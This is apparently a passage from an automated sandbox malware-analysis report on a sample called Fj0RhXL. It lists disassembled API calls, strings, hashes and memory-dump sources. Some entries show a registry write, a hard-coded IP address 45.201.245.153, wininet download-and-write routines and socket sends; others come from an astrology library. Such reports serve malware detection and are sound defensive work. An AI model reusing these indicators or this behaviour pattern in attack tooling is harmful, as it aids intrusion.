                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$__floor_pentium4
                                          • String ID: Body %s%sAltitude%s %s%sAzimuth%s%s%s Azi. Vector%s $ Star #%2d$ Uranian #%d$ %.2f%c)$ %.3f%c)$ %2d%s$ %s$ (%.2f%c$ (%.3f%c$ [%%%d.%df%%%d.%df] [%%%d.%df%%%d.%df]$%-4.4s: $%s Vector%s%s Moon Vector$Earth$Sun
                                          • API String ID: 175470247-281674729
                                          • Opcode ID: 2454af096124a6c4891d459993cad29179b1a0a72c0f51a03483698169f3ee7b
                                          • Instruction ID: 25277263f134d3e626ec62a93a053b89f6c435f89bce4179a2f8372620816ce5
                                          • Opcode Fuzzy Hash: 2454af096124a6c4891d459993cad29179b1a0a72c0f51a03483698169f3ee7b
                                          • Instruction Fuzzy Hash: 48F1E1B1904509DADF24EF52DC48BEDBB78EB45318F2106D9D0C863988DF764AA8CF52
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$ColorText
                                          • String ID: Athena$%s%s%s%s in %s$%s's$%s, and$%s.$(This bit plays only a minor part in their psyche.)$It is difficult for them to express this part of themselves.$It is easy for them to express this part of themselves.$Most often this manifests$Part of $Retrograde $This is a major aspect of their psyche!$This person$and %d%s House:$in an independent, backward, introverted manner, and$in the area of life dealing with$very
                                          • API String ID: 777165778-850604435
                                          • Opcode ID: 3110bc4c9cd9a259ed704017130608e8c22f9447116f458af664aa25c59fdd54
                                          • Instruction ID: 5ecbefd4ab47d95dedd606798dbb3dcec4cbe98e1e6d9c46b589157d95415de3
                                          • Opcode Fuzzy Hash: 3110bc4c9cd9a259ed704017130608e8c22f9447116f458af664aa25c59fdd54
                                          • Instruction Fuzzy Hash: F85107B2A00118CBCB30EB25CA89FDDB77A6B57308F454151D1C06BA04C77ED9998FBA
                                          APIs
                                            • Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC
                                          • _memmove.LIBCMT ref: 03D96242
                                          • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 03D9625D
                                          • RegDeleteValueW.ADVAPI32(?,IpDate), ref: 03D9626D
                                          • RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 03D9628A
                                          • _memset.LIBCMT ref: 03D962AB
                                          • RegCloseKey.ADVAPI32(?), ref: 03D962F2
                                          • _memset.LIBCMT ref: 03D96313
                                          • RegCloseKey.ADVAPI32(?), ref: 03D96403
                                          • Sleep.KERNEL32(000007D0), ref: 03D9640E
                                            • Part of subcall function 03D9ABD2: std::exception::exception.LIBCMT ref: 03D9AC21
                                            • Part of subcall function 03D9ABD2: std::exception::exception.LIBCMT ref: 03D9AC3B
                                            • Part of subcall function 03D9ABD2: __CxxThrowException@8.LIBCMT ref: 03D9AC4C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc_memmove
                                          • String ID: 127.0.0.1$45.201.245.153$45.201.245.153$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
                                          • API String ID: 3267482280-2240284790
                                          • Opcode ID: 9b16428cc3664b6655e74af1251ffd1ce6e764a49ff59c9eac395bed9e7b4741
                                          • Instruction ID: ee102f892a9ffe0e8cf6c6a03cde243f2444e128117dad368129e86e1c6563fd
                                          • Opcode Fuzzy Hash: 9b16428cc3664b6655e74af1251ffd1ce6e764a49ff59c9eac395bed9e7b4741
                                          • Instruction Fuzzy Hash: 5C41D776781300FFE610FB709C46F6E7268DF44B14F044059FA156E2C6E7A0F51986BA
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2C04
                                          • __mtterm.LIBCMT ref: 03DA2C10
                                            • Part of subcall function 03DA28DB: DecodePointer.KERNEL32(0000000C,03D9C6D7,03D9C6BD,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA28EC
                                            • Part of subcall function 03DA28DB: TlsFree.KERNEL32(0000002C,03D9C6D7,03D9C6BD,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2906
                                            • Part of subcall function 03DA28DB: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,03D9C6D7,03D9C6BD,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA8C90
                                            • Part of subcall function 03DA28DB: _free.LIBCMT ref: 03DA8C93
                                            • Part of subcall function 03DA28DB: DeleteCriticalSection.KERNEL32(0000002C,?,?,03D9C6D7,03D9C6BD,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA8CBA
                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 03DA2C26
                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 03DA2C33
                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 03DA2C40
                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 03DA2C4D
                                          • TlsAlloc.KERNEL32(?,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2C9D
                                          • TlsSetValue.KERNEL32(00000000,?,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2CB8
                                          • __init_pointers.LIBCMT ref: 03DA2CC2
                                          • EncodePointer.KERNEL32(?,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2CD3
                                          • EncodePointer.KERNEL32(?,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2CE0
                                          • EncodePointer.KERNEL32(?,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2CED
                                          • EncodePointer.KERNEL32(?,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2CFA
                                          • DecodePointer.KERNEL32(Function_00022A5F,?,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2D1B
                                          • __calloc_crt.LIBCMT ref: 03DA2D30
                                          • DecodePointer.KERNEL32(00000000,?,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2D4A
                                          • GetCurrentThreadId.KERNEL32 ref: 03DA2D5C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                          • API String ID: 3698121176-3819984048
                                          • Opcode ID: 9999e71ea7ab43fa3bf41db8cb04597e692c6f4a30ae2d4e7472f52de182524d
                                          • Instruction ID: 341d295c425b8c17d8a077ea5e08466e8e21927a6af01e5c8c8edbacd22f4a5e
                                          • Opcode Fuzzy Hash: 9999e71ea7ab43fa3bf41db8cb04597e692c6f4a30ae2d4e7472f52de182524d
                                          • Instruction Fuzzy Hash: 3D3173B79B2703DECF11FB7AA90861ABEA4EB447207240E16E410D7359EF758041CF52
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09B9D
                                          • __mtterm.LIBCMT ref: 02F09BA9
                                            • Part of subcall function 02F09874: DecodePointer.KERNEL32(0000000B,02F077B5,02F0779B,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09885
                                            • Part of subcall function 02F09874: TlsFree.KERNEL32(0000002A,02F077B5,02F0779B,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F0989F
                                            • Part of subcall function 02F09874: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,02F077B5,02F0779B,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F0C142
                                            • Part of subcall function 02F09874: _free.LIBCMT ref: 02F0C145
                                            • Part of subcall function 02F09874: DeleteCriticalSection.KERNEL32(0000002A,?,?,02F077B5,02F0779B,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F0C16C
                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02F09BBF
                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02F09BCC
                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02F09BD9
                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02F09BE6
                                          • TlsAlloc.KERNEL32(?,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09C36
                                          • TlsSetValue.KERNEL32(00000000,?,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09C51
                                          • __init_pointers.LIBCMT ref: 02F09C5B
                                          • EncodePointer.KERNEL32(?,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09C6C
                                          • EncodePointer.KERNEL32(?,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09C79
                                          • EncodePointer.KERNEL32(?,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09C86
                                          • EncodePointer.KERNEL32(?,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09C93
                                          • DecodePointer.KERNEL32(Function_000099F8,?,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09CB4
                                          • __calloc_crt.LIBCMT ref: 02F09CC9
                                          • DecodePointer.KERNEL32(00000000,?,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09CE3
                                          • GetCurrentThreadId.KERNEL32 ref: 02F09CF5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                          • API String ID: 3698121176-3819984048
                                          • Opcode ID: 5e2595a780f2f085c71406e5bc4a37430bfd3e7740a2a2100b79eee1d469aab7
                                          • Instruction ID: c7f5d3e1febf6825dc29994ef534de2d70fb2cc770e858ec25edc88bf720599c
                                          • Opcode Fuzzy Hash: 5e2595a780f2f085c71406e5bc4a37430bfd3e7740a2a2100b79eee1d469aab7
                                          • Instruction Fuzzy Hash: 39318F31DC0308DAE7216F75EC88A06BFA1AB95BE87D60A16E511D2395FBB09460DF50
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
                                          • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                          • API String ID: 3970221696-33419044
                                          • Opcode ID: 40042f0e2c147baee8bb669554e6276a2f9902aec0ea73ac8eca4ef65bbde579
                                          • Instruction ID: 4465d639c5c780f17ff5e90b0407360bd2e737e3bbd43326e07c1f62d1098323
                                          • Opcode Fuzzy Hash: 40042f0e2c147baee8bb669554e6276a2f9902aec0ea73ac8eca4ef65bbde579
                                          • Instruction Fuzzy Hash: 0051DC76950318ABEF20EB60DD49FEE7378DF55700F404596B609AA180FA70D798CB71
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$String__calloc_crt$___crt_memmove$DecrementInterlockedLocale$A_statInfoTypeUpdateUpdate::___crt__malloc_crt
                                          • String ID:
                                          • API String ID: 2476947982-0
                                          • Opcode ID: d386fe8ada329bcd54f4fcb46aec4c6d309f332c4f109b7ed81c17e0db4e07f4
                                          • Instruction ID: d02738ab6685d923c2c6275c6c0a2aaa5700e9c0725a17835d0ee0a5f16cf6f9
                                          • Opcode Fuzzy Hash: d386fe8ada329bcd54f4fcb46aec4c6d309f332c4f109b7ed81c17e0db4e07f4
                                          • Instruction Fuzzy Hash: 37B14BB5D00349AFEF21DFA4C880BEEBBB9FF08705F18446AE455EB250D675A845CB20
                                          APIs
                                          • LoadLibraryW.KERNEL32(wininet.dll), ref: 03D891C3
                                          • GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03D891D7
                                          • FreeLibrary.KERNEL32(00000000), ref: 03D891F7
                                          • GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 03D89216
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 03D89253
                                          • _memset.LIBCMT ref: 03D8927E
                                          • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 03D8928C
                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03D892DB
                                          • CloseHandle.KERNEL32(?), ref: 03D892F9
                                          • Sleep.KERNEL32(00000001), ref: 03D89301
                                          • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 03D8930D
                                          • FreeLibrary.KERNEL32(00000000), ref: 03D89328
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
                                          • String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
                                          • API String ID: 1463273941-1099148085
                                          • Opcode ID: 61365048590b62e2a9a5c9a47625887a8f76b4854eb9cd26213fb6ef28e41247
                                          • Instruction ID: 02afe1ce970f6cbed82ad663bc5030e83aa448bc514523ee65869382bf42129d
                                          • Opcode Fuzzy Hash: 61365048590b62e2a9a5c9a47625887a8f76b4854eb9cd26213fb6ef28e41247
                                          • Instruction Fuzzy Hash: D1415872A4021CEADB60EB649C45FEEB7F8FF44700F14C595E589A6280DF70AA458FE4
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __floor_pentium4_memmove
                                          • String ID: (NGl$(NGl$H?Gl$H?Gl$H?Gl$H?Gl$H?Gl$H?Gl$H?Gl$P@Gl$Z$`+Gl$`+Gl$`+Gl$`zGl
                                          • API String ID: 1533020526-2972744755
                                          • Opcode ID: d6d694e1455fdd849eceaef0802432527be6fc933ff03ca4709a5623d4e16d12
                                          • Instruction ID: e00d1ae208fbf9ba6255bc8227e85140fb23fbbb01e7f31e727b08a048c92366
                                          • Opcode Fuzzy Hash: d6d694e1455fdd849eceaef0802432527be6fc933ff03ca4709a5623d4e16d12
                                          • Instruction Fuzzy Hash: D3F13672E08909D7CB20FF67D844AA97774F746B60F360A88D8C557AD8DF3208A4CB95
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$__calloc_crt$String___crt$DecrementInfoInterlockedType__malloc_crt
                                          • String ID:
                                          • API String ID: 3200333012-0
                                          • Opcode ID: b225f8bf6d0a25cc9a4b87f29f96f38cd6fe10dcc0aac8b93f5af57f33443591
                                          • Instruction ID: c91e2c9767b6579cd48149c7267dd4c4fd601d5a70eae13d43f0c5ee83b4c7bf
                                          • Opcode Fuzzy Hash: b225f8bf6d0a25cc9a4b87f29f96f38cd6fe10dcc0aac8b93f5af57f33443591
                                          • Instruction Fuzzy Hash: 01B16EB5D00219AFEF21DFA4C884BEEBBB9FF09701F18406AE585EB250D7759945CB20
                                          APIs
                                          • Sleep.KERNEL32(00000064), ref: 02F0454A
                                          • timeGetTime.WINMM ref: 02F0456B
                                          • GetCurrentThreadId.KERNEL32 ref: 02F0458B
                                          • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02F045AD
                                          • SwitchToThread.KERNEL32 ref: 02F045C7
                                          • SetEvent.KERNEL32(?), ref: 02F04610
                                          • CloseHandle.KERNEL32(?), ref: 02F04634
                                          • send.WS2_32(?,02F17420,00000010,00000000), ref: 02F04658
                                          • SetEvent.KERNEL32(?), ref: 02F04676
                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 02F04681
                                          • WSACloseEvent.WS2_32(?), ref: 02F0468F
                                          • shutdown.WS2_32(?,00000001), ref: 02F046A3
                                          • closesocket.WS2_32(?), ref: 02F046AD
                                          • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 02F046E6
                                          • SetLastError.KERNEL32(000005B4), ref: 02F046FA
                                          • GetCurrentThreadId.KERNEL32 ref: 02F0471B
                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02F04733
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                          • String ID:
                                          • API String ID: 1692523546-0
                                          • Opcode ID: 134150a6819c53b0c00e7de53809fc163e3ceb1d9d8a3d024ee142ac1ca555c8
                                          • Instruction ID: 2f5b8f1e4972cb3958b714fb2c26ed135e5571299438f871071fee0642033120
                                          • Opcode Fuzzy Hash: 134150a6819c53b0c00e7de53809fc163e3ceb1d9d8a3d024ee142ac1ca555c8
                                          • Instruction Fuzzy Hash: 32919B71A00616ABC724DFA4D8C8B6AF7A5FF44785F508519E70A8B680D770F8A1DFD0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __floor_pentium4_sprintf
                                          • String ID: 0Ari00$%11.7f$%2d%.3s%02d$%2dh,%02dm$%7.3f$'%02d"$,%02ds
                                          • API String ID: 4172657630-3850279763
                                          • Opcode ID: 91069a3700af225f6093d19824ce25bf537f4c569492772bd4a0244761c6f80e
                                          • Instruction ID: 5074a5cc96e6900a84cb5a7ee1e669c05f7bc071df4cd37f4f2f203307b07cde
                                          • Opcode Fuzzy Hash: 91069a3700af225f6093d19824ce25bf537f4c569492772bd4a0244761c6f80e
                                          • Instruction Fuzzy Hash: BC31E7B3901908F7DF10AB66DC05EEDBF7CEB45318F130599F484A6910CB758968CBA6
                                          APIs
                                          Strings
                                          • Zone change error: Unknown rule in entry %d of zone %d: '%s', xrefs: 6C35534E
                                          • Zone change error: Bad month in entry %d of zone %d: '%s', xrefs: 6C355371
                                          • Zone change error: The %d zones have %d entries, which differs from total entry limit of %d, xrefs: 6C3552E4
                                          • Zone change error: Rule %d (%s) is never used by any zone change entry., xrefs: 6C355385
                                          • Zone change error: Zone %d unknown: '%s', xrefs: 6C3552F3
                                          • Zone change error: Zone %d (%s) has %d entries, which exceed total entry limit of %d, xrefs: 6C35532C
                                          • timezone changes, xrefs: 6C354F84
                                          • , xrefs: 6C3550AE
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
